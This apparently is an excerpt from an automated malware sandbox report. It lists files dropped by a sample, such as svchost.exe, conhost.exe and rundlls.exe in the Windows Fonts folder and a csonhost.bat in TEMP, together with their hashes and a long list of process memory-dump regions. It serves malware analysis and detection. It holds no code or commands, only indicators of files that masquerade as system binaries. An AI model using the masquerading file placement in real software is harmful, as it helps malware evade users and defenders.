3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
C:\Windows\TEMP\csonhost.bat
Filesize
6KB

MD5
9da29265b1391c18f00c959c64b3fb65

SHA1
dee2f9ded1706933f452ebcd2d5ccd8818af713e

SHA256
fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824

SHA512
6d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2

Download Submit
\??\c:\windows\Fonts\conhost.exe
Filesize
2.9MB

MD5
1b9583c6c3eab1da961aec9e42bfbcb8

SHA1
c60f85fa6bcc463b3d38b7714916b241f2139650

SHA256
6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380

SHA512
0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4

Download Submit
\??\c:\windows\Fonts\rundlls.exe
Filesize
5.2MB

MD5
ed499b3a95e11ecf57e5131cd82c2a14

SHA1
7f37e85068457497f5f34e73edde4963694cfc19

SHA256
c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5

SHA512
f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0

Download Submit
\??\c:\windows\Fonts\svchost.exe
Filesize
87KB

MD5
c945fa7d5ecb219c248ea09ea3bbe8e4

SHA1
8a8596b7e08dc0fa756e6977c64d57ab07e7ab23

SHA256
6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b

SHA512
3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b

Download Submit
memory/376-205-0x0000000000000000-mapping.dmp

Download
memory/740-215-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/740-206-0x0000000000000000-mapping.dmp

Download
memory/820-163-0x0000000000000000-mapping.dmp

Download
memory/880-188-0x0000000000000000-mapping.dmp

Download
memory/980-222-0x0000000000000000-mapping.dmp

Download
memory/1016-162-0x0000000000000000-mapping.dmp

Download
memory/1044-196-0x0000000000000000-mapping.dmp

Download
memory/1108-180-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1108-232-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1196-193-0x0000000000000000-mapping.dmp

Download
memory/1272-150-0x0000000000000000-mapping.dmp

Download
memory/1332-181-0x0000000000000000-mapping.dmp

Download
memory/1340-199-0x0000000000000000-mapping.dmp

Download
memory/1484-221-0x0000000000000000-mapping.dmp

Download
memory/1504-211-0x0000000000000000-mapping.dmp

Download
memory/1504-228-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1504-229-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1548-231-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1548-155-0x0000000000000000-mapping.dmp

Download
memory/1548-171-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1676-197-0x0000000000000000-mapping.dmp

Download
memory/1744-204-0x0000000000000000-mapping.dmp

Download
memory/1748-202-0x0000000000000000-mapping.dmp

Download
memory/1936-234-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1936-227-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/1944-151-0x0000000000000000-mapping.dmp

Download
memory/1956-191-0x0000000000000000-mapping.dmp

Download
memory/1964-143-0x0000000000000000-mapping.dmp

Download
memory/2020-187-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2020-165-0x0000000000000000-mapping.dmp

Download
memory/2020-175-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2064-213-0x0000000000000000-mapping.dmp

Download
memory/2100-194-0x0000000000000000-mapping.dmp

Download
memory/2136-140-0x0000000000000000-mapping.dmp

Download
memory/2164-189-0x0000000000400000-0x0000000000DEF000-memory.dmp

Filesize
9.9MB

Download
memory/2164-233-0x0000000000400000-0x0000000000DEF000-memory.dmp

Filesize
9.9MB

Download
memory/2164-183-0x0000000000000000-mapping.dmp

Download
memory/2248-142-0x0000000000000000-mapping.dmp

Download
memory/2324-198-0x0000000000000000-mapping.dmp

Download
memory/2432-167-0x0000000000000000-mapping.dmp

Download
memory/2520-207-0x0000000000000000-mapping.dmp

Download
memory/2520-216-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/2524-200-0x0000000000000000-mapping.dmp

Download
memory/2524-141-0x0000000000000000-mapping.dmp

Download
memory/2548-178-0x0000000000000000-mapping.dmp

Download
memory/2576-153-0x0000000000000000-mapping.dmp

Download
memory/2604-157-0x0000000000000000-mapping.dmp

Download
memory/2604-172-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3076-223-0x0000000000000000-mapping.dmp

Download
memory/3076-226-0x0000017956410000-0x0000017956430000-memory.dmp

Filesize
128KB

Download
memory/3076-230-0x0000017956570000-0x00000179565B0000-memory.dmp

Filesize
256KB

Download
memory/3104-173-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3104-176-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3104-159-0x0000000000000000-mapping.dmp

Download
memory/3264-139-0x0000000000000000-mapping.dmp

Download
memory/3304-201-0x0000000000000000-mapping.dmp

Download
memory/3312-154-0x0000000000000000-mapping.dmp

Download
memory/3312-170-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/3404-146-0x0000000000000000-mapping.dmp

Download
memory/3688-160-0x0000000000000000-mapping.dmp

Download
memory/3696-169-0x0000000000000000-mapping.dmp

Download
memory/3744-130-0x0000000000400000-0x0000000000809000-memory.dmp

Filesize
4.0MB

Download
memory/3744-182-0x0000000000400000-0x0000000000809000-memory.dmp

Filesize
4.0MB

Download
memory/3840-219-0x0000000000000000-mapping.dmp

Download
memory/3880-147-0x0000000000000000-mapping.dmp

Download
memory/3940-152-0x0000000000000000-mapping.dmp

Download
memory/3972-179-0x0000000000000000-mapping.dmp

Download
memory/4028-145-0x0000000000000000-mapping.dmp

Download
memory/4088-149-0x0000000000000000-mapping.dmp

Download
memory/4172-136-0x0000000000000000-mapping.dmp

Download
memory/4184-134-0x0000000000000000-mapping.dmp

Download
memory/4224-132-0x0000000000000000-mapping.dmp

Download
memory/4268-133-0x0000000000000000-mapping.dmp

Download
memory/4284-131-0x0000000000000000-mapping.dmp

Download
memory/4320-192-0x0000000000000000-mapping.dmp

Download
memory/4324-218-0x0000000140000000-0x0000000140053000-memory.dmp

Filesize
332KB

Download
memory/4324-209-0x0000000000000000-mapping.dmp

Download
memory/4440-203-0x0000000000000000-mapping.dmp

Download
memory/4564-190-0x0000000000000000-mapping.dmp

Download
memory/4584-144-0x0000000000000000-mapping.dmp

Download
memory/4616-220-0x0000000000000000-mapping.dmp

Download
memory/4664-137-0x0000000000000000-mapping.dmp

Download
memory/4720-138-0x0000000000000000-mapping.dmp

Download
memory/4768-135-0x0000000000000000-mapping.dmp

Download
memory/5084-148-0x0000000000000000-mapping.dmp

Download
memory/5112-195-0x0000000000000000-mapping.dmp

Download